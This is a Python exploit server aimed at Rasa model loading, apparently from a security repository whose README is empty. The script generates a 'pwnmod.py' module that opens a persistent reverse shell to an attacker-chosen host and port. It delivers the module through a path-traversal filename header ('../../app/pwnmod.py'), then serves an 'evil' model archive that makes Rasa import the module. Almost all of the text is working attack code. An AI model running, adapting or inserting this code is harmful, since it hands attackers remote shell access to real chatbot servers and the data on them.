README.md
Rendering markdown...
import argparse
import datetime
import http.server
import socketserver
from pathlib import Path
from typing import List
BASE_DIR = Path(__file__).resolve().parent
DEFAULT_EVIL_MODEL = BASE_DIR / "evil_import_model.tar.gz"
def build_pwnmod(reverse_host: str, reverse_port: int) -> bytes:
"""Build pwnmod.py for the Rasa graph import chain."""
payload = f"""import os
import pty
import socket
import threading
import time
def _launch():
# Runs when Python imports pwnmod. It keeps trying to connect back.
while True:
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("{reverse_host}", {reverse_port}))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/sh")
except Exception:
pass
finally:
try:
if s:
s.close()
except Exception:
pass
time.sleep(5)
# Import side effect: Rasa imports pwnmod before it gets Pwn.
threading.Thread(target=_launch, daemon=True).start()
class Pwn:
@classmethod
def load(cls, config=None, model_storage=None, resource=None, execution_context=None, **kwargs):
return cls()
@staticmethod
def get_default_config():
return {{}}
def provide(self, **kwargs):
return None
"""
return payload.encode("utf-8")
class Handler(http.server.BaseHTTPRequestHandler):
server_version = "RasaStage2/1.0"
def do_GET(self) -> None:
if self.path.startswith("/write-module"):
# First request: abuse the model-server filename header to write /app/pwnmod.py.
self.server.hits.append(self._hit("write-module"))
self._send_file(
self.server.pwnmod,
"text/plain; charset=utf-8",
self.server.module_filename,
"stage2-write-module",
)
return
if self.path.startswith("/model"):
# Second request: serve the model whose metadata.json uses pwnmod.Pwn.
self.server.hits.append(self._hit("model"))
self._send_file(
self.server.evil_model.read_bytes(),
"application/x-tar",
self.server.model_filename,
"stage2-evil-model",
)
return
if self.path.startswith("/hits"):
body = "\n".join(self.server.hits).encode("utf-8") + b"\n"
self._send_file(body, "text/plain; charset=utf-8", "hits.txt", "hits")
return
if self.path.startswith("/healthz"):
self._send_file(b"ok\n", "text/plain; charset=utf-8", "healthz.txt", "healthz")
return
self.send_response(404)
self.end_headers()
self.wfile.write(b"not found\n")
def _hit(self, route: str) -> str:
ts = datetime.datetime.utcnow().isoformat(timespec="seconds") + "Z"
return f"{ts} {self.client_address[0]} {self.command} {self.path} {route}"
def _send_file(self, body: bytes, content_type: str, filename: str, etag: str) -> None:
self.send_response(200)
self.send_header("Content-Type", content_type)
self.send_header("Content-Length", str(len(body)))
self.send_header("ETag", etag)
self.send_header("filename", filename)
self.end_headers()
self.wfile.write(body)
def log_message(self, fmt: str, *args) -> None:
print(f"{self.address_string()} - {fmt % args}", flush=True)
class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
pwnmod: bytes
evil_model: Path
module_filename: str
model_filename: str
hits: List[str]
def main() -> None:
parser = argparse.ArgumentParser(description="Minimal Rasa stage2 model server")
parser.add_argument("--listen", default="0.0.0.0")
parser.add_argument("--port", type=int, default=8000)
parser.add_argument("--reverse-host", required=True)
parser.add_argument("--reverse-port", type=int, default=4444)
parser.add_argument("--evil-model", type=Path, default=DEFAULT_EVIL_MODEL)
parser.add_argument("--module-filename", default="../../app/pwnmod.py")
parser.add_argument("--model-filename", default="evil_import_model.tar.gz")
args = parser.parse_args()
if not args.evil_model.exists():
raise SystemExit(f"missing evil model archive: {args.evil_model}")
with ThreadingTCPServer((args.listen, args.port), Handler) as httpd:
httpd.pwnmod = build_pwnmod(args.reverse_host, args.reverse_port)
httpd.evil_model = args.evil_model
httpd.module_filename = args.module_filename
httpd.model_filename = args.model_filename
httpd.hits = []
base = f"http://{args.listen}:{args.port}"
print(f"listening: {base}", flush=True)
print(f"write module url: {base}/write-module", flush=True)
print(f"evil model url: {base}/model", flush=True)
print(f"reverse shell: {args.reverse_host}:{args.reverse_port}", flush=True)
httpd.serve_forever()
if __name__ == "__main__":
main()